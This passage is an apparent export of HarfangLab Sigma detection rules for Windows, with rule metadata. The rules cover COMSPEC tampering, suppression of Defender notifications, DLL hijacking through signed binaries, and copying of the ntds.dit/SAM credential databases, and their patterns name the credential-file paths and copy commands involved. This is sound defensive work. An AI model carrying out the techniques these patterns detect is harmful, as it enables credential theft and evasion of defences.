"content": "title: COMSPEC User Environment Variable Modified\nid: cdc56022-c828-4e2a-a235-31810f322716\ndescription: |\n Detects the modification of the COMSPEC user environment variable.\n COMSPEC should not be normally defined in the user environment variables.\n Attackers can use this newly modified variable to perform a signed script proxy execution and takeover control of a legitimate script.\n It is recommended to investigate the process at the origin of this registry modification to determine the legitimacy of this action.\nreferences:\n - https://attack.mitre.org/techniques/T1216/\ndate: 2022/01/21\nmodified: 2025/01/17\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - attack.t1216\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set:\n EventType: 'SetValue'\n TargetObject: 'HKU\\\\*\\Environment\\comspec'\n\n selection_rename:\n EventType: 'RenameKey'\n NewName: 'HKU\\\\*\\Environment\\comspec'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_cmd:\n Details: '?:\\windows\\system32\\cmd.exe'\n\n condition: ((selection_set and not filter_empty) or selection_rename) and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cdc56022-c828-4e2a-a235-31810f322716",
"rule_name": "COMSPEC User Environment Variable Modified",
"rule_description": "Detects the modification of the COMSPEC user environment variable.\nCOMSPEC should not be normally defined in the user environment variables.\nAttackers can use this newly modified variable to perform a signed script proxy execution and takeover control of a legitimate script.\nIt is recommended to investigate the process at the origin of this registry modification to determine the legitimacy of this action.\n",
"rule_creation_date": "2022-01-21",
"rule_modified_date": "2025-01-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1216"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cdc610fd-f43b-4587-a27f-cd30832c205d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621322Z",
"creation_date": "2026-03-23T11:45:34.621324Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621329Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/1ZRR4H/status/1575364104822444032",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_disable_windows_defender_notifications.yml",
"content": "title: Windows Defender Notifications Disabled\nid: cdc610fd-f43b-4587-a27f-cd30832c205d\ndescription: |\n Detects the disabling of Windows Defender notifications.\n Attackers can use this technique to prevent users from being alerted by a Windows Defender detection notification and thus to hide their malicious activity.\n It is recommended to analyze the process repsonsible for this registry modification and to look for other malicious actions on the host.\nreferences:\n - https://twitter.com/1ZRR4H/status/1575364104822444032\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2022/11/03\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\UX Configuration\\Notification_Suppress'\n Details|contains: 'DWORD' # Any non-zero value works, not just DWORD (0x00000001)\n\n # When the agent is under a lot of pressure, the parent information of a process can be missing.\n # Exceptionnaly for this rule, because it triggers so frequently with a low severity, we will ignore\n # its instances where the parent is missing.\n # When the parent is missing, the ParentImage or ParentCommandLine field is also missing (it is not empty or null)\n # so we can't easily match against that.\n # Instead, we reverse the problem by requiring the ParentImage fields to contain a `\\`.\n ProcessParentImage|contains: '\\'\n\n filter_zero:\n Details: 'DWORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_kiosk_mode:\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k AssignedAccessManagerSvc -s AssignedAccessManagerSvc'\n - '?:\\WINDOWS\\system32\\svchost.exe -k AssignedAccessManagerSvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_userprofile_config:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cdc610fd-f43b-4587-a27f-cd30832c205d",
"rule_name": "Windows Defender Notifications Disabled",
"rule_description": "Detects the disabling of Windows Defender notifications.\nAttackers can use this technique to prevent users from being alerted by a Windows Defender detection notification and thus to hide their malicious activity.\nIt is recommended to analyze the process repsonsible for this registry modification and to look for other malicious actions on the host.\n",
"rule_creation_date": "2022-11-03",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cdc72cb2-30ce-46b8-9611-ad997390c08c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081820Z",
"creation_date": "2026-03-23T11:45:34.081823Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081827Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/ShadowChasing1/status/1557287930267578368",
"https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html",
"https://twitter.com/h2jazi/status/1379816750120861697",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_winword.yml",
"content": "title: DLL Hijacking via WinWord.exe\nid: cdc72cb2-30ce-46b8-9611-ad997390c08c\ndescription: |\n Detects potential Windows DLL Hijacking via WinWord.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by putting a legitimate WinWord executable from Office 2013 alongside a malicious msvcr100.dll.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/ShadowChasing1/status/1557287930267578368\n - https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html\n - https://twitter.com/h2jazi/status/1379816750120861697\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/08/24\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'WinWord.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith:\n - '\\MSVCR100.dll'\n - '\\explorerframe.dll'\n - '\\msctf.dll'\n - '\\mswsock.dll'\n - '\\netprofm.dll'\n - '\\npmproxy.dll'\n - '\\rsaenh.dll'\n - '\\twinapi.dll'\n - '\\windows.storage.dll'\n - '\\windowscodecs.dll'\n - '\\wwlib.dll'\n - '\\AppvIsvSubsystems32.dll'\n - '\\AppvIsvSubsystems64.dll'\n - '\\fastprox.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Microsoft Office\\root\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\'\n - '?:\\Program Files\\Microsoft Office\\Office??\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\Office??\\'\n - '?:\\Microsoft Office\\Office??\\'\n - '?:\\Program Files\\Microsoft Office ??\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n exclusion_naturally_speaking:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Nuance\\NaturallySpeaking*\\Program\\'\n - '?:\\Program Files (x86)\\Nuance\\NaturallySpeaking*\\Program\\'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cdc72cb2-30ce-46b8-9611-ad997390c08c",
"rule_name": "DLL Hijacking via WinWord.exe",
"rule_description": "Detects potential Windows DLL Hijacking via WinWord.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by putting a legitimate WinWord executable from Office 2013 alongside a malicious msvcr100.dll.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-08-24",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cdd4fb16-9b72-475e-9f75-5992667cdf32",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074843Z",
"creation_date": "2026-03-23T11:45:34.074845Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074849Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dfscmd.yml",
"content": "title: DLL Hijacking via dfscmd.exe\nid: cdd4fb16-9b72-475e-9f75-5992667cdf32\ndescription: |\n Detects potential Windows DLL Hijacking via dfscmd.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dfscmd.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\netapi32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cdd4fb16-9b72-475e-9f75-5992667cdf32",
"rule_name": "DLL Hijacking via dfscmd.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dfscmd.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ce21d80b-abf4-48da-b3e7-8e01176c8667",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591235Z",
"creation_date": "2026-03-23T11:45:34.591239Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591246Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tsdiscon.yml",
"content": "title: DLL Hijacking via tsdiscon.exe\nid: ce21d80b-abf4-48da-b3e7-8e01176c8667\ndescription: |\n Detects potential Windows DLL Hijacking via tsdiscon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tsdiscon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ce21d80b-abf4-48da-b3e7-8e01176c8667",
"rule_name": "DLL Hijacking via tsdiscon.exe",
"rule_description": "Detects potential Windows DLL Hijacking via tsdiscon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ce47ead7-672e-49a7-994a-a3b33cdff7db",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080122Z",
"creation_date": "2026-03-23T11:45:34.080124Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080128Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.netwrix.com/2021/11/30/extracting-password-hashes-from-the-ntds-dit-file/",
"https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/",
"https://attack.mitre.org/techniques/T1003/003/"
],
"name": "t1003_003_copying_sensitive_files_with_commandline_tools.yml",
"content": "title: Sensitive Files Copied via Command-line Tools\nid: ce47ead7-672e-49a7-994a-a3b33cdff7db\ndescription: |\n Detects the execution of command-line tools to copy or move sensitive files like the Active Directory Domain Database (ntds.dit) or the Security Account Manager (SAM).\n Such files contain sensitive information including hashed domain, information about domain members such as devices, users, and access rights.\n Attackers can use these copied files for credential access.\n It is recommended to investigate, with the help of the process tree, the context of this action to determine its legitimacy.\nreferences:\n - https://blog.netwrix.com/2021/11/30/extracting-password-hashes-from-the-ntds-dit-file/\n - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\n - https://attack.mitre.org/techniques/T1003/003/\ndate: 2022/11/17\nmodified: 2025/09/17\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.002\n - attack.t1003.003\n - attack.defense_evasion\n - attack.t1006\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith:\n - '\\cmd.exe'\n - '\\powershell.exe'\n - '\\xcopy.exe'\n - OriginalFileName:\n - 'cmd.exe'\n - 'powershell.exe'\n - 'xcopy.exe'\n\n selection_action:\n CommandLine|contains:\n - 'copy '\n - 'Copy-Item'\n - 'move'\n - 'cp'\n - 'mv'\n\n selection_target:\n CommandLine|contains:\n - '\\ntds.dit'\n - '/ntds.dit'\n - '\\config?SAM'\n - '/config?SAM'\n - '\\GLOBALROOT?Device?HarddiskVolumeShadowCopy'\n - '/GLOBALROOT?Device?HarddiskVolumeShadowCopy'\n\n # C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe # Check if sam database has bad permissions\n # This is also used to check hardening against HiveNightmare SeriousSam CVE-2021-36934 $checkSpoolerStatus = $(Get-Service -Name Spooler | Select -Property Status).Status $checkSpoolerStartType = $(Get-Service -Name Spooler | Select -Property StartType).StartType $result=\"OK\" # Check for build $build_number = $((Get-ItemProperty \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\").CurrentBuild) if ($build_number -gt 17763) { Write-Output \"DEBUG:Build number requires additional checks on the sam database permissions...\" # Check for sam permissions $sam_permissions = (get-acl $env:windir\\system32\\config\\sam).Access if (($sam_permissions | where-object { $_.filesystemrights -like \"*read*\" -and $_.identityreference -like \"*BUILTIN\\Users*\" -and $_.acce\n exclusion_cyberwatch:\n - GrandparentImage: '?:\\Program Files\\CYBERWATCH SAS\\CyberwatchAgent\\cyberwatch-agent.exe'\n # if cyberwatch agent is not installed on endpoint, it's checked \"remotely\" using PowerShell and we see only this...\n - ProcessCommandLine: '*System32\\WindowsPowerShell\\v1.0\\powershell.exe*This is also used to check hardening against HiveNightmare SeriousSam*'\n\n exclusion_autobackup7pro:\n - ProcessGrandparentOriginalFileName: 'AutoBackup7Pro.exe'\n - ProcessAncestors|contains: '\\AutoBackup7Pro.exe|'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ce47ead7-672e-49a7-994a-a3b33cdff7db",
"rule_name": "Sensitive Files Copied via Command-line Tools",
"rule_description": "Detects the execution of command-line tools to copy or move sensitive files like the Active Directory Domain Database (ntds.dit) or the Security Account Manager (SAM).\nSuch files contain sensitive information including hashed domain, information about domain members such as devices, users, and access rights.\nAttackers can use these copied files for credential access.\nIt is recommended to investigate, with the help of the process tree, the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2022-11-17",
"rule_modified_date": "2025-09-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.002",
"attack.t1003.003",
"attack.t1006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ce8afb89-a2cc-4070-a2ea-7ab67781ccac",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093049Z",
"creation_date": "2026-03-23T11:45:34.093051Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093056Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_phantom_dll_hijacking_msinfo32.yml",
"content": "title: Phantom DLL Hijacking via msinfo32.exe\nid: ce8afb89-a2cc-4070-a2ea-7ab67781ccac\ndescription: |\n Detects a potential Windows DLL search order hijacking via msinfo32.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/10/06\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msinfo32.dll'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded: '?:\\Windows\\System32\\fveapi.dll'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ce8afb89-a2cc-4070-a2ea-7ab67781ccac",
"rule_name": "Phantom DLL Hijacking via msinfo32.exe",
"rule_description": "Detects a potential Windows DLL search order hijacking via msinfo32.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-10-06",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cee5198e-a01f-4f6e-9fe8-39acefc9b3c1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097320Z",
"creation_date": "2026-03-23T11:45:34.097321Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097326Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_lockapphost.yml",
